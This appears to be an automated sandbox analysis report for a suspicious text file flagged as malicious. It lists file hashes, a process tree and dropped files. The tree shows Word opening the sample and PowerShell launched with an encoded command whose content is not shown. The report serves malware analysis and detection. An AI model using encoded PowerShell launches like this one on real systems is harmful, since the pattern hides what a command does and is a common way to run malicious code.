| Field | Value |
|---|---|
| download | 36hqkWax |
| Full analysis | https://app.any.run/tasks/b3952906-bdd1-470f-8e7b-c876bb62f9b5 |
| Verdict | Malicious activity |
| Analysis date | January 17, 2020, 14:13:15 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | text/plain |
| File info | ASCII text, with very long lines, with no line terminators |
| MD5 | BD027E68238CEAFF773FED3264CC98C4 |
| SHA1 | 45801E4EC5B88C05284BAE0B5B429A66246C28E5 |
| SHA256 | 4EDAD1F0CA5E2E0BD5427AE9C2DA711EAA50CA470FC4C75F4AF28E50D92952F3 |
| SSDEEP | 768:+1Gxt8suqn7kH695c3wCFUkkDkai7I5Ej9Li+JQWDjP6ncCXotFhbc2z7reJ:5X8suSLwwCwkai85cLi343hbc2PreJ |
| PID | CMD | Path | Indicators | Parent process | Process details |
|---|---|---|---|---|---|
| 2108 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\36hqkWax | C:\Windows\system32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 1708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\36hqkWax" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 1552 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 3221225786; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 1940 | powershell /? | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2256 | powershell -encodedcommand <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 4294770688; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRCC34.tmp.cvr | — | — | — |
| 1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJ16UNTQF85PUTLE467Z.temp | — | — | — |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WLE6IIDDXGCP8UROHC8N.temp | — | — | — |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bdbf9.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a4991.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 1708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C5D62F7EB862B07B7D3011278C0161E8 | 7F6BE70408EFD599A2F07A7FA2D6CDA25464578D1E89BEE3DE83E4567D64F848 |
| 1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 1708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$hqkWax | pgc | 10505AAEDF1F3942809338D8E27ED483 | 20A1F4D3F3D85FB5D42729E9C97EDFA9382B09E889D4AD96C003313A0792BAC2 |